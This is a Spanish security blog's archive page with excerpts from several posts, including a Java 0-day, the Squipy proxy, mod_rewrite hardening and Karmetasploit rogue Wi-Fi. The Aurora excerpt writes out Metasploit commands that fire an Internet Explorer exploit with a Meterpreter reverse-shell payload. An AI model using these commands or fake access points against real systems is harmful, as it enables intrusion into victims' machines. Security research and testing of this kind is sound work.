Hace unas horas investigadores en seguridad encontraron una vulnerabilidad 0-day en la plataforma Java, que puede ejecutar código remoto desde cualquier navegador que tenga instalado el plugin de Java. Para aquellos que no lo sepan, una vulnerabilidad 0-day es aquella que es descubierta antes que exista un parche para remediarla y, por lo tanto puede ser explotada sin existir controles específicos para la protección del usuario. Cuando una vulnerabilidad 0-day se hace masiva, su tasa de éxito puede ser muy elevada y puede ser aprovechada por gusanos (llamada wormeable vulnerability) para aumentar su propagación en miles de usuarios y aprovecharse
Sigue leyendoEtiqueta: Hacking
Implementación y explotación de Servicios Web
Índice 1. Introducción 2. Montando una plataforma de pruebas. Requisitos 3. Creando una base de datos para pruebas 4. Creando el conector ODBC 5. Creando un servicio web para pruebas 6. Probando el servicio web en remoto 7. Creando un conector en perl 8. Explotando el servicio web
Sigue leyendoSquipy 1.2 disponible
Ya está disponible la primera versión de Squipy. Como ya comenté, Squipy es un sencillo proxy que permite filtrar y modificar los datos que se envían desde el navegador hacia un servidor web. El interfaz está en castellano y en inglés y su manejo es muy sencillo. Además incorpora algunas herramientas adicionales. La aplicación dispone de dos modalidades de navegación: por un lado, cuando el filtro de captura está desactivado, hay 10 listener que trabajan de forma asíncrona y permiten navegar sin ningún problema. Una vez activamos la depuración, se queda en un único listener que trabaja de forma síncrona
Sigue leyendoAurora (última vulnerabilidad de Internet Explorer)
Al fin se ha publicado la vulnerabilidad, que afecta a mshtml.dll en Internet Explorer 6 y posiblemente 7 y 8 que no usen DEP. En Metasploit ya han sacado un exploit para poder testear si somos vulnerables. Para probarlo, según pone en el blog de Metasploit, hacemos un msfupdate y luego abrimos msfconsole: msf > use exploit/windows/browser/ie_aurora msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ie_aurora) > set LHOST (your IP) msf exploit(ie_aurora) > set URIPATH / msf exploit(ie_aurora) > exploit [*] Exploit running as background job. [*] Started reverse handler on port 4444 [*] Local IP: http://192.168.0.151:8080/ [*] Server started.
Sigue leyendoKarmetasploit
El otro día vi en el foro de elhacker.net un post que hablaba sobre karmetasploit y me puse a indagar un poco a ver como iba esto (que lo suyo me costó jeje todo hay que decirlo. En el portátil no hubo forma pero en el PC funcionó a la primera). Karmetasploit es un plugin de metasploit que usándolo junto con aircrack-ng te permite ir de pesca por el vecindario, o lo que es lo mismo, te permite crear una wifi falsa y totalmente abierta para incitar a los vecinos listillos que quieran conectarse gratis a Internet. Tras conectarse, en
Sigue leyendoSeguridad en webs con mod_rewrite
Para el que no lo sepa, mod_rewrite es un módulo del servidor web Apache que nos permite, a través de un .htaccess, reescribir urls. Con esto, a parte de ganar puntos en Google, para mejorar el posicionamiento de nuestra página, también permite ‘ocultar’ los parámetros que se envían de una página a otra, dificultando una posible inyección de SQL. Por ejemplo, una llamada que antes era: http://miweb.com/noticia.php?id=30 pasa a ser, por ejemplo: http://miweb.com/listado_de_noticias/30 Todo esto conseguido gracias a un pequeño fichero .htaccess similar a este: <IfModule mod_rewrite.c> Options +FollowSymLinks RewriteEngine on RewriteRule ^listado_de_noticias/([0-9]+) noticia.php?id=$1 [L,NC] </IfModule> Como vemos, por un
Sigue leyendoeNYe Spider v1.2
Tras un año sin tocar este programa, he subido una nueva actualización en la que se solucionan varios problemas internos. Básicamente problemas de navegabilidad en ciertas webs. Hice estos cambios porque en Squipy he incorporado también un Spider … bueno, he integrado este Spider 🙂 Y como llevaba tiempo haciendo arreglos cada vez que me topaba con alguna web especial o que provocaba algún error, pues los he agrupado todos en el nuevo release. El motivo por el que subí de la 1.0 a la 1.2 es porque tras crear la 1.1 arreglé un error jejeje .. pero la 1.1
Sigue leyendoSquipy está a punto de parir
Aprovechando que es fin de año y todo el mundo hace promesas, yo me he propuesto escribir más a menudo en el blog. Se que no lo lee ni dios, salvo la gente que llega directamente al POST del TPlus a preguntar una y otra vez lo mismo (esto es un infierno!!!!) pero escribiré para leerme yo mismo 🙂 Bueno, estas Navidades, además de inflarme a turrón de chocolate, he estado programando una pequeña aplicación a la que llamé Squipy. Se trata de un proxy, no para navegar a través de él con varios equipos, sino para analziar el comportamento
Sigue leyendoTraducciones de mis textos
He buscado en Google el título de los paper que he escrito y veo que hay gente que los ha traducido a otros idiomas. Los pongo aquí por si le interesa a alguien … Jugando con los sockets (port scanning): Español (by Pepelux) Inglés (by Pepelux) Portugués (by Th1nk3r) Chino (by eAnGeL) Vulnerabilidades web que permiten acceder al sistema: Español (by Pepelux) Inglés (by Pepelux) Coreano (by bOBaNa)
Sigue leyendo